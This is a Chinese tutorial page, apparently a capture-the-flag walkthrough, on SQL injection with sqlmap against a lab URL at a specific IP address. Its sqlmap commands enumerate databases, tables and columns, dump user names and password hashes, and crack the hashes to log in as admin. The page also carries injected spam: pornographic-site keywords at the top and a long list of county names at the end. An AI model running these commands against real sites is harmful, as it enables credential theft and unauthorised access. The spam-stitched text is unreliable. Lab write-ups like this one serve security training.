最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

sqlmap注入圖文詳解

 更新時(shí)間:2021年08月11日 15:18:43   作者:徐林2333  
sqlmap 是一個(gè)自動(dòng)SQL 射入工具。本文收集了一些利用Sqlmap做注入測(cè)試的TIPS,其中也包含一點(diǎn)繞WAF的技巧,便于大家集中查閱,希望能給你帶來(lái)幫助

1.發(fā)現(xiàn)此網(wǎng)址可能存在sql注入漏洞,我們進(jìn)行sql盲注入測(cè)試一下是否存在漏洞。

地址欄輸入 and 1=1 發(fā)現(xiàn)頁(yè)面正常顯示。

在這里插入圖片描述

再次輸入and 1=2 頁(yè)面出現(xiàn)錯(cuò)誤,說(shuō)明該頁(yè)面可能存在sql注入漏洞

在這里插入圖片描述

2.現(xiàn)在拿出我們的kali工具,sqlmap進(jìn)行注入測(cè)試。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

在這里插入圖片描述

3.可以看到存在注入漏洞,掃到了5個(gè)數(shù)據(jù)庫(kù)。要獲取管理員用戶密碼,我們可以先從stormgroup注入。查看stormgroup這個(gè)數(shù)據(jù)庫(kù)存在的表單

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

在這里插入圖片描述

4.接下來(lái)查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

在這里插入圖片描述

5.上一步可以看到,name,password 是不是很熟悉。ok接下來(lái)我們開始獲取這兩列的數(shù)據(jù)。

在這里插入圖片描述

在這里插入圖片描述

6.可以看到password是經(jīng)過(guò)md5加密,接下來(lái)我們把他解密。這里推薦給大家我自己收集的多種解密網(wǎng)址:解密網(wǎng)址大全點(diǎn)擊這里

在這里插入圖片描述

7.now! 密碼已經(jīng)呈現(xiàn)在我們眼前?。。?!找到后臺(tái)地址進(jìn)行登錄。

在這里插入圖片描述

8.END 登錄成功,拿到flag,提交。Gameover !

總結(jié)

本篇文章就到這里了,希望能給你帶來(lái)幫助,也希望您能夠多多關(guān)注腳本之家的更多內(nèi)容!

相關(guān)文章

  • mysql學(xué)習(xí)之引擎、Explain和權(quán)限的深入講解

    mysql學(xué)習(xí)之引擎、Explain和權(quán)限的深入講解

    這篇文章主要給大家介紹了關(guān)于mysql學(xué)習(xí)之引擎、Explain和權(quán)限的相關(guān)資料,文中通過(guò)示例代碼將引擎、Explain和權(quán)限介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用mysql具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2018-06-06
  • MySQL 使用規(guī)范總結(jié)

    MySQL 使用規(guī)范總結(jié)

    MySQL已經(jīng)成為世界上最受歡迎的數(shù)據(jù)庫(kù)管理系統(tǒng)之一,無(wú)論是用在小型開發(fā)項(xiàng)目上,還是用在構(gòu)建那較大型的網(wǎng)站,MySQL都用實(shí)力證明了自己是一個(gè)穩(wěn)定、可靠、快速、可信的系統(tǒng),足以勝任任何數(shù)據(jù)存儲(chǔ)業(yè)務(wù)的需要。本文總結(jié)了MySQL的使用規(guī)范
    2020-09-09
  • MySQL性能參數(shù)詳解之Skip-External-Locking參數(shù)介紹

    MySQL性能參數(shù)詳解之Skip-External-Locking參數(shù)介紹

    MySQL的配置文件my.cnf中默認(rèn)存在一行skip-external-locking的參數(shù),即跳過(guò)外部鎖定。根據(jù)MySQL開發(fā)網(wǎng)站的官方解釋,External-locking用于多進(jìn)程條件下為MyISAM數(shù)據(jù)表進(jìn)行鎖定
    2016-05-05
  • MySQL主從同步、讀寫分離配置步驟

    MySQL主從同步、讀寫分離配置步驟

    根據(jù)要求配置MySQL主從備份、讀寫分離,結(jié)合網(wǎng)上的文檔,對(duì)搭建的步驟和出現(xiàn)的問(wèn)題以及解決的過(guò)程做了如下筆記
    2012-03-03
  • Mysql如何查詢鎖表

    Mysql如何查詢鎖表

    這篇文章主要介紹了Mysql如何查詢鎖表問(wèn)題,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-07-07
  • 全面盤點(diǎn)MySQL中的那些重要日志文件

    全面盤點(diǎn)MySQL中的那些重要日志文件

    大家好,本篇文章主要講的是全面盤點(diǎn)MySQL中的那些重要日志文件,感興趣的同學(xué)快來(lái)看一看吧,對(duì)你有用的話記得收藏,方便下次瀏覽
    2021-11-11
  • mysql 正則表達(dá)式查詢含有非數(shù)字和字符的記錄

    mysql 正則表達(dá)式查詢含有非數(shù)字和字符的記錄

    這篇文章主要介紹了mysql 正則表達(dá)式查詢含有非數(shù)字和字符的記錄的相關(guān)資料,需要的朋友可以參考下
    2016-12-12
  • 十億級(jí)MySQL大表的查詢優(yōu)化10種方法

    十億級(jí)MySQL大表的查詢優(yōu)化10種方法

    針對(duì)十億級(jí)MySQL大表的查詢優(yōu)化,本文主要介紹了10種經(jīng)過(guò)驗(yàn)證的核心優(yōu)化策略及對(duì)應(yīng)SQL實(shí)現(xiàn)方案,具有一定的參考價(jià)值,感興趣的可以了解一下
    2025-03-03
  • mysql 數(shù)據(jù)庫(kù)鏈接狀態(tài)確認(rèn)實(shí)驗(yàn)(推薦)

    mysql 數(shù)據(jù)庫(kù)鏈接狀態(tài)確認(rèn)實(shí)驗(yàn)(推薦)

    這篇文章主要介紹了mysql 數(shù)據(jù)庫(kù)鏈接狀態(tài)確認(rèn)實(shí)驗(yàn),通過(guò)本文我選擇 了三種方案給大家詳細(xì)講解,結(jié)合實(shí)例代碼給大家介紹的非常詳細(xì),需要的朋友可以參考下
    2022-09-09
  • 使用MySQL設(shè)置遠(yuǎn)程數(shù)據(jù)庫(kù)以優(yōu)化網(wǎng)站性能的操作步驟

    使用MySQL設(shè)置遠(yuǎn)程數(shù)據(jù)庫(kù)以優(yōu)化網(wǎng)站性能的操作步驟

    隨著您的應(yīng)用程序或網(wǎng)站的增長(zhǎng),您可能會(huì)發(fā)現(xiàn)已經(jīng)超出了當(dāng)前的設(shè)置,如果您目前將 Web 服務(wù)器和數(shù)據(jù)庫(kù)后端托管在同一臺(tái) VPS 上,一個(gè)好主意是將這兩個(gè)功能分開,以便每個(gè)功能可以在自己的機(jī)器上運(yùn)行和增長(zhǎng),在本指南中,我們將討論如何配置一個(gè)遠(yuǎn)程數(shù)據(jù)庫(kù)服務(wù)器
    2024-11-11

最新評(píng)論

晋中市| 华蓥市| 进贤县| 奎屯市| 定南县| 托克逊县| 柏乡县| 原平市| 江孜县| 卫辉市| 裕民县| 张家口市| 祁东县| 武乡县| 宁化县| 延庆县| 乌兰浩特市| 鸡西市| 郎溪县| 苍梧县| 郯城县| 汉源县| 永胜县| 瓮安县| 浪卡子县| 茶陵县| 子洲县| 河池市| 乳源| 永仁县| 嘉黎县| 随州市| 临颍县| 东乡族自治县| 濮阳市| 依安县| 托克逊县| 新蔡县| 嘉定区| 化隆| 海阳市|